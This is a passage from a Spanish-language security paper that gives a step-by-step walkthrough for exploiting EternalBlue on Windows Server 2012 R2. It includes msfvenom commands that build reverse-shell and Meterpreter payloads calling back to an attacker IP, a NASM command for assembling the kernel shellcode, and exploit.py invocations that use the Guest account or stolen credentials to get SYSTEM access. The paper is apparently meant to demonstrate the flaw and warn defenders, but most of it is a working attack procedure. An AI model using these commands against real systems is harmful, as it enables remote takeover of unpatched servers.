10.0.2.6  Atacante.
  • 4. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 4 Preparación de la shellcode En primer lugar, es necesario ensamblar una kernel shellcode desarrollada para el exploit Eternablue. A la misma, le añadiremos al final la userland shellcode, la cual será el payload de Metasploit que deseemos ejecutar en el target una vez que se ha impactado. Ensamblar la kernel shellcode Desde el siguiente link es posible obtener la kernel shellcode desarrollada por Sleepya: https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501#file- eternalblue_x64_kshellcode-asm. Guardamos el archivo con extensión .asm y utilizamos NASM con el siguiente comando para el ensamblaje: nasm -f bin kernel_shell_x64.asm. Generar la userland shellcode: payload con msfvenom Utilizaremos msfvenom para la generación del payload. Con fines demostrativos, realizaremos dos ataques diferentes: uno nos permitirá obtener una shell inversa vía TCP y otro nos devolverá una sesión de meterpreter. Para ello, generaremos por separado ambos payloads de la siguiente manera: windows/x64/shell/reverse_tcp: msfvenom -p windows/x64/shell/reverse_tcp -f raw -o shell_msf.bin EXITFUNC=thread LHOST=[IP_ATACANTE] LPORT=4444
  • 5. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 5 windows/x64/meterpreter/reverse_tcp: msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o meterpreter_msf.bin EXITFUNC=thread LHOST=[IP_ATACANTE] LPORT=4444 Concatenar kernel shellcode + userland shellcode Una vez ensamblada la kernel shellcode y generados los payloads de Metasploit que deseamos, será necesario concatenarlos. Este paso no es más que realizar un “append” de una shellcode con la otra. kernel shellcode + shell/reverse_tcp: kernel shellcode + meterpreter/reverse_tcp: Terminados estos pasos, tenemos dos payloads de ataque diferentes listos para usar.
  • 6. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 6 Obtención de una shell inversa Por supuesto, haremos uso del exploit de Sleepya que podemos obtenerlo desde el siguiente enlace: https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e y debemos guardarlo con extensión .py en la máquina atacante. Antes de proceder con el mismo, será necesario configurar Metasploit para que reciba la conexión inversa de la shellcode en el momento que sea ejecutada en el target. A continuación, veremos dos formas diferentes de lograr un impacto exitoso. A través de una cuenta “Guest” Por defecto, la cuenta Guest no viene activa en Windows Server 2012 R2. Sin embargo, si el administrador la ha activado, podremos aprovecharla y obtener una shell SYSTEM en el target. El primer paso es abrir el exploit.py con cualquier editor de texto e indicar que será esa cuenta la utilizada para autenticación. Como vemos en la imagen superior, en las líneas 42 y 43 podemos definir dicha información. Guardados los cambios, procedemos con la ejecución del exploit con los siguientes parámetros: python exploit.py <ip_target> reverse_shell.bin 500 El parámetro con valor “500” corresponde al “numGroomConn”. El ajustar la cantidad de conexiones “Groom” ayuda a alcanzar un pool de memoria contigua en el kernel para que la sobreescritura del buffer termine en la ubicación que deseamos y lograr ejecutar la shellcode correctamente. Para esta userland shellcode utilizaremos un número de conexiones Groom de 500. Si al impactar no recibimos la conexión inversa, podemos probar incrementando aún más este número.
  • 7. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 7 Inmediatamente recibiremos la shell inversa en la terminal de Metasploit: A través de un usuario y contraseña válido Otra manera de lograr una explotación con éxito es utilizando credenciales válidas que hayamos obtenido previamente de un usuario del equipo. Al igual que en el caso del usuario Guest, no importan los privilegios de la cuenta que utilicemos para autenticar, la terminal que recibiremos siempre será de SYSTEM. Editamos nuevamente el exploit.py para añadir los datos de otra cuenta de usuario. Guardamos y ejecutamos el exploit de la misma forma que antes.
  • 8. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 8 Obteniendo el mismo resultado.
  • 9. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 9 Obtención de una sesión de Meterpreter Pasemos ahora a la demostración más deseada: obtener una sesión de meterpreter con privilegios de administrador. Antes que nada, será necesario configurar Metasploit para recibir la conexión inversa. Indicaremos al exploit que se autentique con Guest aunque, como ya se mostró previamente, es posible utilizar cualquier cuenta de usuario válida, no influirá en el resultado. Ejecutaremos el exploit utilizando los siguientes parámetros: python exploit.py <ip_target> meterpreter.bin 200 Observemos que en este caso reducimos las conexiones de Groom a 200. Si el exploit se ejecutara correctamente pero no recibimos la sesión, podemos probar ir incrementando este valor de a 50. Inmediatamente recibiremos la sesión de meterpreter en la terminal de Metasploit.
  • 10. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 10
  • 11. EXPLOTAR ETERNALBLUE EN WINDOWS SERVER 2012 R2 11 Palabras finales… Finalmente, hemos obtenido una shell de Meterpreter con privilegios de administrador en Windows Server 2012 R2. Hace poco escribí estas mismas palabras en un paper ya publicado en exploit-db, pero refiriéndome a Windows 7 y Windows Server 2008 R2. Todo parece indicar que los análisis que realizamos en la comunidad de infosec están dando buenos resultados. Sin embargo, esto debe elevar el sentido de alerta el máximo, en quienes están a cargo de proteger infraestructuras informáticas. Agradecimientos: Worawit Wang (@sleepya_). Por aguantarme siempre: Claudio Caracciolo (@holesec). Mateo Martinez (@MateoMartinezOK). Luciano Martins (@clucianomartins). Arturo Busleiman (@buanzo). Ezequiel Sallis (@simubucks). Cristian Borghello (@crisborghe / @seguinfo). Sol O. (@0zz4n5). @DragonJar || @ekoparty || “Las Pibas de Infosec”. -- Sheila A. Berta - @UnaPibaGeek.